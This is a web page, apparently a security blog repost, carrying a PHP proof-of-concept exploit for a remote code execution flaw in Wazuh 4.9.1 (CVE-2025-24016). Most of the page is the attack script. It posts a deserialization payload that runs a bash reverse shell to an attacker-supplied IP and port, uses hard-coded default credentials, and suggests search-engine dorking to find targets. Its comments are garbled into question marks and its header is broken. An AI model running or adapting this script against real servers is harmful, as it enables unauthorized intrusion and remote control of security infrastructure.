Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Wazuh 4.9.1 Remote Code Execution

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 26
=============================================================================================================================================
| # Title : Wazuh v =============================================================================================================================================
| # Title : Wazuh v 4.9.1 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://wazuh.com/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description:

This PHP script is used to exploit the Remote Code Execution (RCE) vulnerability in the Wazuh server.
It sends a request to the target server with a special payload that allows a reverse shell to be opened on the local server.

[+] save code as poc.php .

[+] USage : php poc.php -u https://<worker-server>:55000/security/user/authenticate/run_as -i 192.168.1.10 -p 4444

[+] PayLoad :

<?php

// ????? ??????? ??????
ini_set('log_errors', 1);
ini_set('error_log', 'php_errors.log');
date_default_timezone_set('UTC');

// ????? ???? ??????? ???????
function color_print($text, $color = null) {
switch ($color) {
case 'error':
return "\033[1;31m$text\033[0m"; // ????? ??????
case 'warning':
return "\033[1;33m$text\033[0m"; // ????? ??????
case 'success':
return "\033[1;32m$text\033[0m"; // ????? ??????
case 'info':
return "\033[1;36m$text\033[0m"; // ????? ??????
default:
return $text;
}
}

// ?????? ?? ???????
function version_check() {
try {
$req_version = phpversion(); // ????? PHP
$pyfiglet_version = '2.5.0'; // ????????? (??????? ??????? ??? ??????)
echo "????????? ???????:\n";
echo "PHP: $req_version\n";
echo "PyFiglet: $pyfiglet_version\n";
} catch (Exception $e) {
echo "??? ?????? ?? ???????: " . $e->getMessage() . "\n";
}
}

// ?????? ?? ??? ??? IP
function check_ip($ip) {
if (filter_var($ip, FILTER_VALIDATE_IP)) {
return true;
} else {
echo color_print("IP ??? ????: $ip", 'error') . "\n";
return false;
}
}

// ?????? ?? ??? ??? Port
function check_port($port) {
if (is_numeric($port) && $port > 0 && $port <= 65535) {
return true;
} else {
echo color_print("Port ??? ????: $port", 'error') . "\n";
return false;
}
}

// ?????? ?? ??? ??? URL
function check_url($url) {
if (filter_var($url, FILTER_VALIDATE_URL)) {
return true;
} else {
echo color_print("URL ??? ????. ???? ?? ??? ???? ?? http:// ?? https://", 'error') . "\n";
return false;
}
}

// ???? ?????? ??????? ?? ??? ???????
function parse_args() {
global $argv;
$args = getopt('u:i:p:user::pass::c::n::');
return $args;
}

function main() {
$args = parse_args();

// ?????? ?? ??? ????????
if (!isset($args['u']) || !isset($args['i']) || !isset($args['p'])) {
echo color_print("??? ????? URL ? IP ? Port!", 'error') . "\n";
exit(1);
}

if (!check_ip($args['i']) || !check_port($args['p']) || !check_url($args['u'])) {
exit(1);
}

version_check();

echo "Wazuh RCE - CVE-2025-24016\n";
echo "?????? ????? ????????? ???!\n";
echo "????????? ??? ?????? ?? ?????.\n";
echo "??????: Jessie\n";
echo "????????: Aiman? Cahyo? Ihsan ? Arch \n";

// ????? ???????
$payload = [
"__unhandled_exc__" => [
"__class__" => "os.system",
"__args__" => [
"bash -i >& /dev/tcp/{$args['i']}/{$args['p']} 0>&1"
]
]
];

$headers = [
"Content-Type: application/json",
"X-Header-Name: Custom-Header"
];

// ?????? ????????
$username = $args['user'] ?? 'wazuh-wui';
$password = $args['pass'] ?? 'MyS3cr37P450r.*-';

// ????? ??? POST
$url = $args['u'];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_USERPWD, "$username:$password");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$response = curl_exec($ch);
$status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($status_code != 200) {
echo color_print("??? ???? ?????????: $status_code", 'error') . "\n";
if (strpos($response, 'Unauthorized') !== false) {
echo color_print("??? ????????", 'error') . "\n";
} else {
echo color_print("??????? ??? ??????: $response", 'error') . "\n";
}
exit(1);
}

echo color_print("??? ???????? ?????!", 'success') . "\n";
echo "?????????: " . color_print($response, 'info') . "\n";

// ????? ?? ????
echo color_print("?? ????? ??????? ????? ?????? ??? {$args['i']}:{$args['p']}", 'info') . "\n";
sleep(5); // ?????? ???????

$command = "bash -i";
$reverse_shell = shell_exec($command);
if ($reverse_shell === null) {
echo color_print("??? ???? ??????", 'error') . "\n";
} else {
echo color_print("?? ??????? ????? ?????? ?????!", 'success') . "\n";
}
}

main();

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================